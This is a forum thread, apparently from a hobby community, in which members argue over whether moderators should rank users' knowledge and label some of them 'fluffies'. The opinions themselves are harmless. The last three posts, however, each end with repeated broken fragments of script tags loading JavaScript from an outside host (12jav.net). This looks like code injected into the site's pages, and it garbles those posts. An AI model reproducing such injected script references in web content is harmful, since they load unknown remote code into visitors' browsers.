Mods/Admin may not know the extent of your knowledge: Eg; giving you incorrect rank.
Positives
Notes down fluffies.
Can see what people are leveled at based on the known knowledge of the moderators/admin.
Basically, I dont like the idea of being 'rated'. Somebody can not know the full extent of your knowledge with just talking to you a few times. On the other hand, it labels who is a fluff. I think there should just be 'knowledge' bars displaying who is fluff- not levelling the people who aren't. That is just my opinion :)
It serves a respectable purpose, though I agree that it is odd for one person to rank another when they may not know the extent of what the other knows. However, I wouldn't mind someone going through and markinge very 'fluff' they come across. Too many on this site, trying to pass themselves off as something else.
Everyone is a newbie at something, no one is an expert because there's always more to learn about everything.
I don't like the idea of being rated by someone who doesn't have a front row seat on my knowledge, and I don't like the idea of others being rated in the same manner.
Ranks have always bothered me, it takes away equality, and with the number of ways to rank the members here already, I believe is enough.
I really hate drama, so I'm hoping that disagreeing opinions on this can get along and that ones with lower rankings don't complain so much. I don't mind it personally, I think if site moderators and admin are ranking us, it's a trustworthy rank, based on shown knowledge. We were given a personal bio, and if we disagree with our rank, we can give our opinions on ourselves there. It is really what we think of ourselves that matters, so I don't see it affecting anyone's self esteem, and definitely not intentionally hurting anyone. And it helps divide us to the point where we know between who a conversation may best be held, but does not divide us to the point where any groups should be turned against each other. So, I think it is fair enough :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I think it's a nice idea, who could be insulted, there's always more to learn, and the expert rank would just mean "Very Knowledgeable" Nobody can be an expert, it's impossible, there is always more to learn. I love learning :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Well, what i feared most about this system has come to fruition. I was afraid that peoples levels would be judged unfairly due to differences in traditions and individual opinion and practice. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
